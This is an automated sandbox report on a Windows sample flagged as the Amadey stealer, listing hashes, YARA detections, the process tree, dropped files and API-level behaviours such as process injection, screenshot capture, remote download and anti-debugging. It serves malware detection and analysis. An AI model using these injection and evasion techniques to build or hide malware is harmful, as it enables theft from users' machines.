Edit tour

Windows Analysis Report
hBB2KnTndI

Overview

General Information

Sample Name:	hBB2KnTndI (renamed file extension from none to exe)
Analysis ID:	635800
MD5:	b413ff6e943c415afc26640ff535c724
SHA1:	fcc13d52bf28416f3b8a594d58113fd8828a4093
SHA256:	7ff0ff6e51a58398ad73da3cc8e7e6233a23e49d93aaa4b190672e4f9f08b9bb
Tags:	32exetrojan
Infos:

Detection

Amadey

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected Amadeys stealer DLL

Multi AV Scanner detection for submitted file

Writes to foreign memory regions

Allocates memory in foreign processes

Injects a PE file into a foreign processes

Contains functionality to inject code into remote processes

Contains functionality to prevent local Windows debugging

Uses 32bit PE files

One or more processes crash

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to dynamically determine API calls

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains functionality for execution timing, often used to detect debuggers

Creates a DirectInput object (often for capturing keystrokes)

Found inlined nop instructions (likely shell or obfuscated code)

PE file contains an invalid checksum

Drops PE files

Contains functionality to read the PEB

Checks if the current process is being debugged

Found evaded block containing many API calls

PE / OLE file has an invalid certificate

PE file contains more sections than normal

Dropped file seen in connection with other malware

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

hBB2KnTndI.exe (PID: 6828 cmdline: "C:\Users\user\Desktop\hBB2KnTndI.exe" MD5: B413FF6E943C415AFC26640FF535C724)

conhost.exe (PID: 6836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

AppLaunch.exe (PID: 6060 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 6807F903AC06FF7E1670181378690B22)

orxds.exe (PID: 6188 cmdline: "C:\Users\user\AppData\Local\Temp\a10b8dfb5f\orxds.exe" MD5: 6807F903AC06FF7E1670181378690B22)

WerFault.exe (PID: 6220 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6828 -s 272 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000003.259020968.00000000008B0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000000.261443990.00000000004B7000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000000.260767513.00000000004B7000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security

Unpacked PEs

Source	Rule	Description	Author
0.3.hBB2KnTndI.exe.8b0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.3.hBB2KnTndI.exe.8b0000.0.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
5.2.AppLaunch.exe.400000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.2.hBB2KnTndI.exe.400000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.0.hBB2KnTndI.exe.400000.2.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.0.hBB2KnTndI.exe.400000.1.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.0.hBB2KnTndI.exe.400000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 2 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: hBB2KnTndI.exe

Virustotal: Detection: 39%

Perma Link

Source: hBB2KnTndI.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source:	Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: hBB2KnTndI.exe, hBB2KnTndI.exe, 00000000.00000000.261443990.00000000004B7000.00000004.00000001.01000000.00000003.sdmp, AppLaunch.exe, 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmp
Source:	Binary string: applaunch.pdb source: orxds.exe, orxds.exe, 00000007.00000002.263709457.0000000000241000.00000020.00000001.01000000.00000004.sdmp, orxds.exe.5.dr

Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_00424F00 FindFirstFileA,_errno,GetLastError,_errno,_errno,_errno,_errno,_errno,		0_2_00424F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_0041E292 FindFirstFileExW,		5_2_0041E292

Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 4x nop then push ebp	0_2_00484064
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 4x nop then push ebp	0_2_004A01FB
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 4x nop then push ebp	0_2_00434186
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 4x nop then push ebp	0_2_00484184
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 4x nop then push ebp	0_2_004A01AB
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 4x nop then push ebp	0_2_004A029B
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 4x nop then push ebp	0_2_0049C290
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 4x nop then push ebp	0_2_004842A4
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 4x nop then push ebp	0_2_004843C4
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 4x nop then sub esp, 1Ch	0_2_0042C470
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 4x nop then push ebp	0_2_004844E4
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	0_2_00430520
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 4x nop then push ebp	0_2_00484604
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 4x nop then push ebp	0_2_0046C6B0
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 4x nop then push ebp	0_2_00484724
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 4x nop then push ebx	0_2_00484844
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 4x nop then jmp 0046E320h	0_2_00470A20
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 4x nop then jmp 0046E320h	0_2_00470B64
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 4x nop then push ebx	0_2_00488BBB
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 4x nop then push edi	0_2_004951B0
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 4x nop then mov eax, dword ptr [004F6360h]	0_2_00475351
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 4x nop then push ebp	0_2_0046DB14
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 4x nop then push ebp	0_2_0046DC34
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 4x nop then push ebp	0_2_0046DD54
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 4x nop then push ebp	0_2_0046DE74
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 4x nop then mov edx, dword ptr [ecx+08h]	0_2_00431E1A
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 4x nop then push ebp	0_2_0046DF94
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 4x nop then push ebp	0_2_0046E0B4
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 4x nop then push ebp	0_2_0046E1D4
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 4x nop then push ebp	0_2_0046E2F4
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 4x nop then push ebp	0_2_0046E414
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 4x nop then push ebp	0_2_0046E534
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 4x nop then push esi	0_2_0046E654
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 4x nop then mov dword ptr [ecx], 004FAB7Ch	0_2_0048E934
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	0_2_0049A9C0
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 4x nop then mov dword ptr [ecx], 004FA468h	0_2_0049EAA2
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 4x nop then jmp 00484510h	0_2_00486B40
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 4x nop then push ebp	0_2_0049EB72
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 4x nop then jmp 00484510h	0_2_00486C84

Source: hBB2KnTndI.exe

String found in binary or memory: http://gcc.gnu.org/bugs.html):

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Code function: 5_2_00407090 CreateMutexW,GetLastError,GetFileAttributesA,CreateFileA,InternetOpenA,InternetOpenUrlA,InternetReadFile,WriteFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

5_2_00407090

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Code function: 5_2_00402150 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,

5_2_00402150

Source: hBB2KnTndI.exe, 00000000.00000000.260905702.000000000092A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: hBB2KnTndI.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\hBB2KnTndI.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6828 -s 272

Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_00468160	0_2_00468160
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_0041C250	0_2_0041C250
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_004503C0	0_2_004503C0
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_00454440	0_2_00454440
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_004D87F0	0_2_004D87F0
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_0041C8E0	0_2_0041C8E0
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_0041CA70	0_2_0041CA70
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_0044CA70	0_2_0044CA70
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_00420CD0	0_2_00420CD0
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_004D8C88	0_2_004D8C88
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_00450DA0	0_2_00450DA0
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_00444DB0	0_2_00444DB0
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_004DCE9D	0_2_004DCE9D
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_00454F10	0_2_00454F10
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_00414FF0	0_2_00414FF0
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_004CD137	0_2_004CD137
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_004593D0	0_2_004593D0
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_0044D5E0	0_2_0044D5E0
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_004416C0	0_2_004416C0
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_004656F0	0_2_004656F0
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_00429800	0_2_00429800
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_00441B50	0_2_00441B50
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_00425D40	0_2_00425D40
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_00445DE0	0_2_00445DE0
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_00459DB0	0_2_00459DB0
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_004DDE50	0_2_004DDE50
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_0043DFF0	0_2_0043DFF0
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_00449F90	0_2_00449F90
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_00466420	0_2_00466420
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_004BA540	0_2_004BA540
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_00456500	0_2_00456500
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_0045A780	0_2_0045A780
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_004428E0	0_2_004428E0
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_0044AA40	0_2_0044AA40
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_0044EA00	0_2_0044EA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_00422868	5_2_00422868
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_00409877	5_2_00409877
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_00425827	5_2_00425827
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_00404120	5_2_00404120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_00426A7D	5_2_00426A7D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_00427A30	5_2_00427A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_004223D0	5_2_004223D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_00416D17	5_2_00416D17
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_00425707	5_2_00425707

Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: String function: 004A5D70 appears 102 times
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: String function: 004AB9D0 appears 69 times
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: String function: 0040146E appears 85 times
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: String function: 004A57E0 appears 38 times
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: String function: 0041EC30 appears 76 times
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: String function: 004966B0 appears 50 times
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: String function: 004AB7D0 appears 31 times
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: String function: 00496680 appears 58 times
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: String function: 004A2310 appears 45 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: String function: 004123E0 appears 118 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: String function: 004137B0 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\a10b8dfb5f\orxds.exe	Code function: String function: 0024FB02 appears 62 times

Source: hBB2KnTndI.exe

Static PE information: invalid certificate

Source: hBB2KnTndI.exe

Static PE information: Number of sections : 16 > 10

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\a10b8dfb5f\orxds.exe 115D04150F524C103CA08E18305B0B103A3767336E19404235D2017F4B233CE5

Source: hBB2KnTndI.exe

Virustotal: Detection: 39%

Source: hBB2KnTndI.exe

Static PE information: Section: .text IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_CNT_CODE, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\hBB2KnTndI.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\hBB2KnTndI.exe "C:\Users\user\Desktop\hBB2KnTndI.exe"
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process created: C:\Users\user\AppData\Local\Temp\a10b8dfb5f\orxds.exe "C:\Users\user\AppData\Local\Temp\a10b8dfb5f\orxds.exe"
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6828 -s 272
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process created: C:\Users\user\AppData\Local\Temp\a10b8dfb5f\orxds.exe "C:\Users\user\AppData\Local\Temp\a10b8dfb5f\orxds.exe"	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

File created: C:\Users\user\AppData\Local\Temp\a10b8dfb5f

Jump to behavior

Source: classification engine

Classification label: mal76.spyw.evad.winEXE@7/5@0/0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6836:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6828

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: hBB2KnTndI.exe

Static file information: File size 2476494 > 1048576

Source:	Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: hBB2KnTndI.exe, hBB2KnTndI.exe, 00000000.00000000.261443990.00000000004B7000.00000004.00000001.01000000.00000003.sdmp, AppLaunch.exe, 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmp
Source:	Binary string: applaunch.pdb source: orxds.exe, orxds.exe, 00000007.00000002.263709457.0000000000241000.00000020.00000001.01000000.00000004.sdmp, orxds.exe.5.dr

Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_004115A7 push eax; mov dword ptr [esp], ebx	0_2_004115AE
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_0047C21F push eax; mov dword ptr [esp], ebx	0_2_0047C23B
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_0047C3C0 push eax; mov dword ptr [esp], ebx	0_2_0047C630
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_0047C63F push eax; mov dword ptr [esp], ebx	0_2_0047C630
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_0047879C push eax; mov dword ptr [esp], ebx	0_2_004787D2
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_0047CB1F push eax; mov dword ptr [esp], ebx	0_2_0047CB3B
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_00469077 push eax; mov dword ptr [esp], ebx	0_2_00469093
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_0047D07F push eax; mov dword ptr [esp], ebx	0_2_0047D09B
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_004790F2 push eax; mov dword ptr [esp], ebx	0_2_0047910E
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_0046917C push eax; mov dword ptr [esp], ebx	0_2_00469198
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_0047D2D0 push eax; mov dword ptr [esp], ebx	0_2_0047D650
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_004793BA push eax; mov dword ptr [esp], ebx	0_2_004793D6
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_00479530 push eax; mov dword ptr [esp], ebx	0_2_00479666
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_0047D666 push eax; mov dword ptr [esp], ebx	0_2_0047D650
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_00479780 push eax; mov dword ptr [esp], ebx	0_2_004798B6
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_0047D920 push eax; mov dword ptr [esp], ebx	0_2_0047DCA0
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_0047DCB6 push eax; mov dword ptr [esp], ebx	0_2_0047DCA0
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_0046A160 push eax; mov dword ptr [esp], ebx	0_2_0046A67B
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_0046A690 push eax; mov dword ptr [esp], ebx	0_2_0046ABAB
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_00452B11 push eax; mov dword ptr [esp], ebx	0_2_00452B2D
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_00452C31 push eax; mov dword ptr [esp], ebx	0_2_00452C4D
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_00452D51 push eax; mov dword ptr [esp], ebx	0_2_00452D6D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_004137F6 push ecx; ret	5_2_00413809
Source: C:\Users\user\AppData\Local\Temp\a10b8dfb5f\orxds.exe	Code function: 7_2_0024F8E8 push ecx; ret	7_2_0024FAB8
Source: C:\Users\user\AppData\Local\Temp\a10b8dfb5f\orxds.exe	Code function: 7_2_0024FAD0 push ecx; ret	7_2_0024FAE3

Source: hBB2KnTndI.exe	Static PE information: section name: /4
Source: hBB2KnTndI.exe	Static PE information: section name: /14
Source: hBB2KnTndI.exe	Static PE information: section name: /29
Source: hBB2KnTndI.exe	Static PE information: section name: /41
Source: hBB2KnTndI.exe	Static PE information: section name: /55
Source: hBB2KnTndI.exe	Static PE information: section name: /67
Source: hBB2KnTndI.exe	Static PE information: section name: /80
Source: hBB2KnTndI.exe	Static PE information: section name: /91
Source: hBB2KnTndI.exe	Static PE information: section name: /102

Source: C:\Users\user\Desktop\hBB2KnTndI.exe

Code function: 0_2_00401340 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,atexit,

0_2_00401340

Source: hBB2KnTndI.exe

Static PE information: real checksum: 0x2619f8 should be: 0x25f5ed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

File created: C:\Users\user\AppData\Local\Temp\a10b8dfb5f\orxds.exe

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\a10b8dfb5f\orxds.exe

Code function: 7_2_0024D53A rdtsc

7_2_0024D53A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Evaded block: after key decision

graph_5-19863

Source: C:\Users\user\Desktop\hBB2KnTndI.exe	API coverage: 5.2 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	API coverage: 6.4 %
Source: C:\Users\user\AppData\Local\Temp\a10b8dfb5f\orxds.exe	API coverage: 8.1 %

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Code function: 5_2_00405230 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,

5_2_00405230

Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_00424F00 FindFirstFileA,_errno,GetLastError,_errno,_errno,_errno,_errno,_errno,		0_2_00424F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_0041E292 FindFirstFileExW,		5_2_0041E292

